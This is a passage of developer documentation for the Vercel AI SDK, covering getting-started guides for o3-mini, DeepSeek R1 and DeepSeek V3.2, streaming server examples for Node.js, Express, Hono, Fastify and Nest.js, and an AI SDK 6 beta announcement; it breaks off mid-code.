const result = streamText({
model: openai('o3-mini'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}
      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out our support for o3-mini in the OpenAI Provider.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
---
title: Get started with DeepSeek R1
description: Get started with DeepSeek R1 using the AI SDK.
tags: ['getting-started', 'reasoning']
---
Get started with DeepSeek R1
With the release of DeepSeek R1, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like DeepSeek R1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
DeepSeek R1
DeepSeek R1 is a series of advanced AI models designed to tackle complex reasoning tasks in science, coding, and mathematics. These models are optimized to "think before they answer," producing detailed internal chains of thought that aid in solving challenging problems.
The series includes two primary variants:
- DeepSeek R1-Zero: Trained exclusively with reinforcement learning (RL) without any supervised fine-tuning. It exhibits advanced reasoning capabilities but may struggle with readability and formatting.
- DeepSeek R1: Combines reinforcement learning with cold-start data and supervised fine-tuning to improve both reasoning performance and the readability of outputs.
Benchmarks
DeepSeek R1 models excel in reasoning tasks, delivering competitive performance across key benchmarks:
- AIME 2024 (Pass@1): 79.8%
- MATH-500 (Pass@1): 97.3%
- Codeforces (Percentile): Top 4% (96.3%)
- GPQA Diamond (Pass@1): 71.5%
Prompt Engineering for DeepSeek R1 Models
DeepSeek R1 models excel with structured and straightforward prompts. The following best practices can help achieve optimal performance:
- Use a structured format: Leverage the model's preferred output structure with <think> tags for reasoning and <answer> tags for the final result (see the sketch after this list).
- Prefer zero-shot prompts: Avoid few-shot prompting as it can degrade performance; instead, directly state the problem clearly.
- Specify output expectations: Guide the model by defining desired formats, such as markdown for readability or XML-like tags for clarity.
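A minimal sketch of that structured format (the prompt wording is illustrative):
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { text } = await generateText({
  model: deepseek('deepseek-reasoner'),
  prompt:
    'What is the sum of the first 50 positive integers? ' +
    'Reason inside <think> tags, then give the final result inside <answer> tags.',
});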
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek R1 with the AI SDK:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { reasoningText, text } = await generateText({
model: deepseek('deepseek-reasoner'),
prompt: 'Explain quantum entanglement.',
});
The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use DeepSeek R1 via Fireworks:
import { fireworks } from '@ai-sdk/fireworks';
import {
generateText,
wrapLanguageModel,
extractReasoningMiddleware,
} from 'ai';
// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
model: fireworks('accounts/fireworks/models/deepseek-r1'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
const { reasoningText, text } = await generateText({
model: enhancedModel,
prompt: 'Explain quantum entanglement.',
});
Or to use Groq's deepseek-r1-distill-llama-70b model:
import { groq } from '@ai-sdk/groq';
import {
generateText,
wrapLanguageModel,
extractReasoningMiddleware,
} from 'ai';
// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
model: groq('deepseek-r1-distill-llama-70b'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
const { reasoningText, text } = await generateText({
model: enhancedModel,
prompt: 'Explain quantum entanglement.',
});
When using DeepSeek R1 series models with third-party providers like Together AI, we recommend using the startWithReasoning option in the extractReasoningMiddleware function, as these providers may return the reasoning content without the opening <think> tag.
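For example, with Together AI (a sketch; the provider package @ai-sdk/togetherai and the model ID from the comparison table below are the assumed setup):
import { togetherai } from '@ai-sdk/togetherai';
import {
  generateText,
  wrapLanguageModel,
  extractReasoningMiddleware,
} from 'ai';
// startWithReasoning treats the response as reasoning from the first token,
// for providers that omit the opening <think> tag
const enhancedModel = wrapLanguageModel({
  model: togetherai('deepseek-ai/DeepSeek-R1'),
  middleware: extractReasoningMiddleware({
    tagName: 'think',
    startWithReasoning: true,
  }),
});
const { reasoningText, text } = await generateText({
  model: enhancedModel,
  prompt: 'Explain quantum entanglement.',
});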
Model Provider Comparison
You can use DeepSeek R1 with the AI SDK through various providers. Here's a comparison of the providers that support DeepSeek R1:
| Provider | Model ID | Reasoning Tokens |
|---|---|---|
| DeepSeek | deepseek-reasoner | Supported |
| Fireworks | accounts/fireworks/models/deepseek-r1 | Requires Middleware |
| Groq | deepseek-r1-distill-llama-70b | Requires Middleware |
| Azure | DeepSeek-R1 | Requires Middleware |
| Together AI | deepseek-ai/DeepSeek-R1 | Requires Middleware |
| FriendliAI | deepseek-r1 | Requires Middleware |
| LangDB | deepseek/deepseek-reasoner | Requires Middleware |
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and DeepSeek R1:
In a new Next.js application, first install the AI SDK and the DeepSeek provider:
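For example, with pnpm:
pnpm add ai @ai-sdk/react @ai-sdk/deepseek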
Then, create a route handler for the chat endpoint:
import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: deepseek('deepseek-reasoner'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'reasoning') {
return <pre key={index}>{part.text}</pre>;
}
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
return null;
})}
</div>
))}
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Limitations
While DeepSeek R1 models are powerful, they have certain limitations:
- No tool-calling support: DeepSeek R1 cannot directly interact with APIs or external tools.
- No object generation support: DeepSeek R1 does not support structured object generation. However, you can pair it with a model that does support structured object generation (like gpt-4o-mini) to generate objects, as sketched below. See the structured object generation with a reasoning model recipe for more information.
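As a minimal sketch of that recipe (the model choices, schema, and prompts are illustrative):
import { deepseek } from '@ai-sdk/deepseek';
import { openai } from '@ai-sdk/openai';
import { generateText, generateObject } from 'ai';
import { z } from 'zod';

// Step 1: let DeepSeek R1 reason about the problem
const { text: answer } = await generateText({
  model: deepseek('deepseek-reasoner'),
  prompt: 'Compare the pros and cons of solar and wind energy for home use.',
});

// Step 2: structure the answer with a model that supports object generation
const { object } = await generateObject({
  model: openai('gpt-4o-mini'),
  schema: z.object({
    pros: z.array(z.string()),
    cons: z.array(z.string()),
    recommendation: z.string(),
  }),
  prompt: `Extract the key points from this answer:\n\n${answer}`,
});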
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
DeepSeek R1 opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.
title: Get started with DeepSeek V3.2 description: Get started with DeepSeek V3.2 using the AI SDK. tags: ['getting-started', 'agents']
Get started with DeepSeek V3.2
With the release of DeepSeek V3.2, there has never been a better time to start building AI applications that require advanced reasoning and agentic capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like DeepSeek V3.2 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
DeepSeek V3.2
DeepSeek V3.2 is a frontier model that harmonizes high computational efficiency with superior reasoning and agent performance. It introduces several key technical breakthroughs that enable it to perform comparably to GPT-5 while remaining open-source.
The series includes two primary variants:
- DeepSeek V3.2: The official successor to V3.2-Exp. A balanced model optimized for both reasoning and inference efficiency, delivering GPT-5 level performance.
- DeepSeek V3.2-Speciale: A high-compute variant with maxed-out reasoning capabilities that rivals Gemini-3.0-Pro. Achieves gold-medal performance in IMO 2025, CMO 2025, ICPC World Finals 2025, and IOI 2025. As of release, it does not support tool-use.
Benchmarks
DeepSeek V3.2 models excel in both reasoning and agentic tasks, delivering competitive performance across key benchmarks:
Reasoning Capabilities
- AIME 2025 (Pass@1): 96.0% (Speciale)
- HMMT 2025 (Pass@1): 99.2% (Speciale)
- HLE (Pass@1): 30.6%
- Codeforces (Rating): 2701 (Speciale)
Agentic Capabilities
- SWE Verified (Resolved): 73.1%
- Terminal Bench 2.0 (Acc): 46.4%
- τ2 Bench (Pass@1): 80.3%
- Tool Decathlon (Pass@1): 35.2%
Model Options
When using DeepSeek V3.2 with the AI SDK, you have two model options:
| Model Alias | Model Version | Description |
|---|---|---|
| deepseek-chat | DeepSeek-V3.2 (Non-thinking Mode) | Standard chat model |
| deepseek-reasoner | DeepSeek-V3.2 (Thinking Mode) | Enhanced reasoning for complex problem-solving |
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building agents, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek V3.2 with the AI SDK:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepseek('deepseek-chat'),
prompt: 'Explain the concept of sparse attention in transformers.',
});
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building an agent with Next.js, the AI SDK, and DeepSeek V3.2:
In a new Next.js application, first install the AI SDK and the DeepSeek provider:
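For example, with pnpm:
pnpm add ai @ai-sdk/react @ai-sdk/deepseek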
Then, create a route handler for the chat endpoint:
import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: deepseek('deepseek-reasoner'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({ sendReasoning: true });
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'text' || part.type === 'reasoning') {
return <div key={index}>{part.text}</div>;
}
return null;
})}
</div>
))}
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Enhance Your Agent with Tools
One of the key strengths of DeepSeek V3.2 is its agentic capabilities. You can extend your agent's functionality by adding tools that allow the model to perform specific actions or retrieve information.
Update Your Route Handler
Let's add a weather tool to your agent. Update your route handler at app/api/chat/route.ts:
import { deepseek } from '@ai-sdk/deepseek';
import {
convertToModelMessages,
stepCountIs,
streamText,
tool,
UIMessage,
} from 'ai';
import { z } from 'zod';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: deepseek('deepseek-reasoner'),
messages: convertToModelMessages(messages),
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72,
unit: 'fahrenheit',
}),
}),
},
stopWhen: stepCountIs(5),
});
return result.toUIMessageStreamResponse({ sendReasoning: true });
}
This adds a weather tool that the model can call when needed. The stopWhen: stepCountIs(5) parameter allows the agent to continue executing for multiple steps (up to 5), enabling it to use tools and reason iteratively before stopping. Learn more about loop control to customize when and how your agent stops execution.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Guides description: Learn how to build AI applications with the AI SDK
Guides
These use-case specific guides are intended to help you build real applications with the AI SDK.
<IndexCards cards={[ { title: 'RAG Agent', description: 'Learn how to build a RAG Agent with the AI SDK and Next.js.', href: '/cookbook/guides/rag-chatbot', }, { title: 'Multi-Modal Agent', description: 'Learn how to build a multi-modal agent that can process images and PDFs with the AI SDK.', href: '/cookbook/guides/multi-modal-chatbot', }, { title: 'Slackbot Agent', description: 'Learn how to use the AI SDK to build an AI Agent in Slack.', href: '/cookbook/guides/slackbot', }, { title: 'Natural Language Postgres (SQL Agent)', description: 'Learn how to build a Next.js app that lets you talk to a PostgreSQL database in natural language.', href: '/cookbook/guides/natural-language-postgres', }, { title: 'Get started with Computer Use', description: "Get started with Claude's Computer Use capabilities with the AI SDK.", href: '/cookbook/guides/computer-use', }, { title: 'Get started with Gemini 2.5', description: 'Get started with Gemini 2.5 using the AI SDK.', href: '/cookbook/guides/gemini-2-5', }, { title: 'Get started with Claude 4', description: 'Get started with Claude 4 using the AI SDK.', href: '/cookbook/guides/claude-4', }, { title: 'OpenAI Responses API', description: 'Get started with the OpenAI Responses API using the AI SDK.', href: '/cookbook/guides/openai-responses', }, { title: 'Get started with Claude 3.7 Sonnet', description: 'Get started with Claude 3.7 Sonnet using the AI SDK.', href: '/cookbook/guides/sonnet-3-7', }, { title: 'Get started with Llama 3.1', description: 'Get started with Llama 3.1 using the AI SDK.', href: '/cookbook/guides/llama-3_1', }, { title: 'Get started with GPT-5', description: 'Get started with GPT-5 using the AI SDK.', href: '/cookbook/guides/gpt-5', }, { title: 'Get started with OpenAI o1', description: 'Get started with OpenAI o1 using the AI SDK.', href: '/cookbook/guides/o1', }, { title: 'Get started with OpenAI o3-mini', description: 'Get started with OpenAI o3-mini using the AI SDK.', href: '/cookbook/guides/o3', }, { title: 'Get started with DeepSeek R1', description: 'Get started with DeepSeek R1 using the AI SDK.', href: '/cookbook/guides/r1', }, ]} />
title: Node.js HTTP Server description: Learn how to use the AI SDK in a Node.js HTTP server tags: ['api servers', 'streaming']
Node.js HTTP Server
You can use the AI SDK in a Node.js HTTP server to generate text and stream it to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it with curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/node-http-server
UI Message Stream
You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.
import { streamText } from 'ai';
import { createServer } from 'http';
createServer(async (req, res) => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeUIMessageStreamToResponse(res);
}).listen(8080);
Sending Custom Data
createUIMessageStream and pipeUIMessageStreamToResponse can be used to send custom data to the client.
import {
createUIMessageStream,
pipeUIMessageStreamToResponse,
streamText,
} from 'ai';
import { createServer } from 'http';
createServer(async (req, res) => {
switch (req.url) {
case '/stream-data': {
const stream = createUIMessageStream({
execute: ({ writer }) => {
// write some custom data
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'Hello, world!',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(
result.toUIMessageStream({
sendStart: false,
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
}),
);
},
});
pipeUIMessageStreamToResponse({ stream, response: res });
break;
}
}
}).listen(8080);
Text Stream
You can send a text stream to the client using pipeTextStreamToResponse.
import { streamText } from 'ai';
import { createServer } from 'http';
createServer(async (req, res) => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeTextStreamToResponse(res);
}).listen(8080);
Troubleshooting
- Streaming not working when proxied
title: Express description: Learn how to use the AI SDK in an Express server tags: ['api servers', 'streaming']
Express
You can use the AI SDK in an Express server to generate and stream text and objects to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it with curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/express
UI Message Stream
You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.
import { streamText } from 'ai';
import express, { Request, Response } from 'express';
const app = express();
app.post('/', async (req: Request, res: Response) => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeUIMessageStreamToResponse(res);
});
app.listen(8080, () => {
console.log(`Example app listening on port ${8080}`);
});
Sending Custom Data
pipeUIMessageStreamToResponse can be used to send custom data to the client.
import {
createUIMessageStream,
pipeUIMessageStreamToResponse,
streamText,
} from 'ai';
import express, { Request, Response } from 'express';
const app = express();
app.post('/custom-data-parts', async (req: Request, res: Response) => {
pipeUIMessageStreamToResponse({
response: res,
stream: createUIMessageStream({
execute: async ({ writer }) => {
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'Hello, world!',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(result.toUIMessageStream({ sendStart: false }));
},
}),
});
});
app.listen(8080, () => {
console.log(`Example app listening on port ${8080}`);
});
Text Stream
You can send a text stream to the client using pipeTextStreamToResponse.
import { streamText } from 'ai';
import express, { Request, Response } from 'express';
const app = express();
app.post('/', async (req: Request, res: Response) => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeTextStreamToResponse(res);
});
app.listen(8080, () => {
console.log(`Example app listening on port ${8080}`);
});
Troubleshooting
- Streaming not working when proxied
title: Hono description: Example of using the AI SDK in a Hono server. tags: ['api servers', 'streaming']
Hono
You can use the AI SDK in a Hono server to generate and stream text and objects to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it with curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/hono
UI Message Stream
You can use the toUIMessageStreamResponse method to create a properly formatted streaming response.
import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';
const app = new Hono();
app.post('/', async c => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
return result.toUIMessageStreamResponse();
});
serve({ fetch: app.fetch, port: 8080 });
Text Stream
You can use the toTextStreamResponse method to return a text stream response.
import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';
const app = new Hono();
app.post('/text', async c => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Write a short poem about coding.',
});
return result.toTextStreamResponse();
});
serve({ fetch: app.fetch, port: 8080 });
Sending Custom Data
You can use createUIMessageStream and createUIMessageStreamResponse to send custom data to the client.
import { serve } from '@hono/node-server';
import {
createUIMessageStream,
createUIMessageStreamResponse,
streamText,
} from 'ai';
import { Hono } from 'hono';
const app = new Hono();
app.post('/stream-data', async c => {
// immediately start streaming the response
const stream = createUIMessageStream({
execute: ({ writer }) => {
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'Hello, world!',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(
result.toUIMessageStream({
sendStart: false,
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
}),
);
},
});
return createUIMessageStreamResponse({ stream });
});
serve({ fetch: app.fetch, port: 8080 });
Troubleshooting
- Streaming not working when proxied
title: Fastify description: Learn how to use the AI SDK in a Fastify server tags: ['api servers', 'streaming']
Fastify
You can use the AI SDK in a Fastify server to generate and stream text and objects to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it with curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/fastify
Data Stream
You can use the toDataStream method to get a data stream from the result and then pipe it to the response.
import { streamText } from 'ai';
import Fastify from 'fastify';
const fastify = Fastify({ logger: true });
fastify.post('/', async function (request, reply) {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
// Mark the response as a v1 data stream:
reply.header('X-Vercel-AI-Data-Stream', 'v1');
reply.header('Content-Type', 'text/plain; charset=utf-8');
return reply.send(result.toDataStream());
});
fastify.listen({ port: 8080 });
Sending Custom Data
createDataStream can be used to send custom data to the client.
import { createDataStream, streamText } from 'ai';
import Fastify from 'fastify';
const fastify = Fastify({ logger: true });
fastify.post('/stream-data', async function (request, reply) {
// immediately start streaming the response
const dataStream = createDataStream({
execute: async dataStreamWriter => {
dataStreamWriter.writeData('initialized call');
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.mergeIntoDataStream(dataStreamWriter);
},
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
});
// Mark the response as a v1 data stream:
reply.header('X-Vercel-AI-Data-Stream', 'v1');
reply.header('Content-Type', 'text/plain; charset=utf-8');
return reply.send(dataStream);
});
fastify.listen({ port: 8080 });
Text Stream
You can use the textStream property to get a text stream from the result and then pipe it to the response.
import { streamText } from 'ai';
import Fastify from 'fastify';
const fastify = Fastify({ logger: true });
fastify.post('/', async function (request, reply) {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
reply.header('Content-Type', 'text/plain; charset=utf-8');
return reply.send(result.textStream);
});
fastify.listen({ port: 8080 });
Troubleshooting
- Streaming not working when proxied
title: Nest.js description: Learn how to use the AI SDK in a Nest.js server tags: ['api servers', 'streaming']
Nest.js
You can use the AI SDK in a Nest.js server to generate and stream text and objects to the client.
Examples
The examples show how to implement a Nest.js controller that uses the AI SDK to stream text and objects to the client.
Full example: github.com/vercel/ai/examples/nest
UI Message Stream
You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.
import { Controller, Post, Res } from '@nestjs/common';
import { streamText } from 'ai';
import { Response } from 'express';
@Controller()
export class AppController {
@Post('/')
async root(@Res() res: Response) {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeUIMessageStreamToResponse(res);
}
}
Sending Custom Data
createUIMessageStream and pipeUIMessageStreamToResponse can be used to send custom data to the client.
import { Controller, Post, Res } from '@nestjs/common';
import {
createUIMessageStream,
streamText,
pipeUIMessageStreamToResponse,
} from 'ai';
import { Response } from 'express';
@Controller()
export class AppController {
@Post('/stream-data')
async streamData(@Res() response: Response) {
const stream = createUIMessageStream({
execute: ({ writer }) => {
// write some data
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'Hello, world!',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(
result.toUIMessageStream({
sendStart: false,
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
}),
);
},
});
pipeUIMessageStreamToResponse({ stream, response });
}
}
Text Stream
You can use the pipeTextStreamToResponse method to get a text stream from the result and then pipe it to the response.
import { Controller, Post, Res } from '@nestjs/common';
import { streamText } from 'ai';
import { Response } from 'express';
@Controller()
export class AppController {
@Post()
async example(@Res() res: Response) {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeTextStreamToResponse(res);
}
}
Troubleshooting
- Streaming not working when proxied
title: AI SDK by Vercel description: The AI SDK is the TypeScript toolkit for building AI applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.
AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.
Why use the AI SDK?
Integrating large language models (LLMs) into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK standardizes integrating artificial intelligence (AI) models across supported providers. This lets developers focus on building great AI applications rather than wasting time on technical details.
For example, here’s how you can generate text with various models using the AI SDK:
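A minimal sketch (the model identifier is illustrative; switching models or providers only requires changing the model string):
import { generateText } from 'ai';

const { text } = await generateText({
  model: 'openai/gpt-4o',
  prompt: 'What is love?',
});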
The AI SDK has two main libraries:
- AI SDK Core: A unified API for generating text, structured objects, tool calls, and building agents with LLMs.
- AI SDK UI: A set of framework-agnostic hooks for quickly building chat and generative user interfaces.
Model Providers
The AI SDK supports multiple model providers.
Templates
We've built some templates that include AI SDK integrations for different use cases, providers, and frameworks. You can use these templates to get started with your AI-powered application.
Starter Kits
Feature Exploration
Frameworks
Generative UI
Security
Join our Community
If you have questions about anything related to the AI SDK, you're always welcome to ask in the Vercel Community.
llms.txt (for Cursor, Windsurf, Copilot, Claude etc.)
You can access the entire AI SDK documentation in Markdown format at ai-sdk.dev/llms.txt. This can be used to ask any LLM (assuming it has a big enough context window) questions about the AI SDK based on the most up-to-date documentation.
Example Usage
For instance, to prompt an LLM with questions about the AI SDK:
- Copy the documentation contents from ai-sdk.dev/llms.txt
- Use the following prompt format:
Documentation:
{paste documentation here}
---
Based on the above documentation, answer the following:
{your question}
title: AI SDK 6 Beta description: Get started with the Beta version of AI SDK 6.
Announcing AI SDK 6 Beta
Why AI SDK 6?
AI SDK 6 is a major version due to the introduction of the v3 Language Model Specification that powers new capabilities like agents and tool approval. However, unlike AI SDK 5, this release is not expected to have major breaking changes for most users.
The version bump reflects improvements to the specification, not a complete redesign of the SDK. If you're using AI SDK 5, migrating to v6 should be straightforward with minimal code changes.
Beta Version Guidance
The AI SDK 6 Beta is intended for:
- Trying out new features and giving us feedback on the developer experience
- Experimenting with agents and tool approval workflows
Your feedback during this beta phase directly shapes the final stable release. Share your experiences through GitHub issues.
Installation
To install the AI SDK 6 Beta, run the following command:
npm install ai@beta @ai-sdk/openai@beta @ai-sdk/react@beta
What's New in AI SDK 6?
AI SDK 6 introduces several features (with more to come soon!):
Agent Abstraction
A new unified interface for building agents with full control over execution flow, tool loops, and state management.
Tool Execution Approval
Request user confirmation before executing tools, enabling native human-in-the-loop patterns.
Structured Output (Stable)
Generate structured data alongside tool calling with generateText and streamText - now stable and production-ready.
Reranking Support
Improve search relevance by reordering documents based on their relationship to a query using specialized reranking models.
Image Editing Support
Native support for image editing (coming soon).
Agent Abstraction
AI SDK 6 introduces a powerful new Agent interface that provides a standardized way to build agents.
Default Implementation: ToolLoopAgent
The ToolLoopAgent class provides a default implementation out of the box:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { weatherTool } from '@/tool/weather';
export const weatherAgent = new ToolLoopAgent({
model: __MODEL__,
